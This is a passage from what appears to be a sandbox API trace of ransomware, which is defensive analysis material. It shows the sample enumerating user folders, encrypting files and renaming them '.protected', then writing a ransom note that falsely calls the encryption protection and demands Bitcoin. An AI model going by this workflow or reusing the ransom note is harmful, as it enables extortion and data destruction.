| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\.") returned 56 [0089.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\..") returned 57 [0089.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java") returned 59 [0089.301] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0089.302] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0089.302] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*") returned 61 [0089.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.302] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.302] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.302] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\.") returned 61 [0089.302] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.302] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.303] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.303] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\..") returned 62 [0089.303] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Windows") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Program Files") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Program Files (x86)") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="$Recycle.bin") returned 1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="System Volume Information") returned -1 [0089.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU") returned 62 [0089.303] lstrcmpW (lpString1="AU", lpString2=".") returned 1 [0089.303] lstrcmpW (lpString1="AU", lpString2="..") returned 1 [0089.303] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*") returned 64 [0089.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\.") returned 64 [0089.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.304] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\..") returned 65 [0089.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.304] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.304] StrStrIW (lpFirst="au.cab", lpSrch=".protected") returned 0x0 [0089.304] lstrcmpW (lpString1="au.cab", lpString2="RESTORE_FILES.txt") returned -1 [0089.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".txt") returned 0x0 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".rar") returned 0x0 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".zip") returned 0x0 [0089.305] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.315] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.315] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.316] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.316] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.319] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.320] CloseHandle (hObject=0x150) returned 1 [0089.320] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.protected") returned 79 [0089.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.protected")) returned 1 [0089.321] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Windows") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Program Files") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Program Files (x86)") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="$Recycle.bin") returned 1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="System Volume Information") returned -1 [0089.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.321] StrStrIW (lpFirst="au.msi", lpSrch=".protected") returned 0x0 [0089.321] lstrcmpW (lpString1="au.msi", lpString2="RESTORE_FILES.txt") returned -1 [0089.321] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.321] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".txt") returned 0x0 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".rar") returned 0x0 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".zip") returned 0x0 [0089.322] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.324] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.324] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.324] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.324] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.330] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.330] CloseHandle (hObject=0x150) returned 1 [0089.330] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.protected") returned 79 [0089.330] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.protected")) returned 1 [0089.331] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.331] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.331] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\RESTORE_FILES.txt") returned 80 [0089.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.332] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.332] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.332] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.332] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.333] CloseHandle (hObject=0x14c) returned 1 [0089.333] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Windows") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Program Files") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="Program Files (x86)") returned -1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="$Recycle.bin") returned 1 [0089.333] lstrcmpiW (lpString1="Deployment", lpString2="System Volume Information") returned -1 [0089.333] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment") returned 70 [0089.334] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0089.334] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0089.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*") returned 72 [0089.334] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.334] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.334] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.334] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.334] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\.") returned 72 [0089.334] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.334] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.334] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\..") returned 73 [0089.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.335] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Windows") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Program Files") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="Program Files (x86)") returned -1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="$Recycle.bin") returned 1 [0089.335] lstrcmpiW (lpString1="deployment.properties", lpString2="System Volume Information") returned -1 [0089.335] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrIW (lpFirst="deployment.properties", lpSrch=".protected") returned 0x0 [0089.335] lstrcmpW (lpString1="deployment.properties", lpString2="RESTORE_FILES.txt") returned -1 [0089.335] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.335] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrW (lpFirst="deployment.properties", lpSrch=".txt") returned 0x0 [0089.335] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.335] StrStrW (lpFirst="deployment.properties", lpSrch=".rar") returned 0x0 [0089.336] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0089.336] StrStrW (lpFirst="deployment.properties", lpSrch=".zip") returned 0x0 [0089.336] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2cf, lpOverlapped=0x0) returned 1 [0089.346] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2cf, lpOverlapped=0x0) returned 1 [0089.346] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.346] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.347] CloseHandle (hObject=0x150) returned 1 [0089.347] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.protected") returned 102 [0089.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js 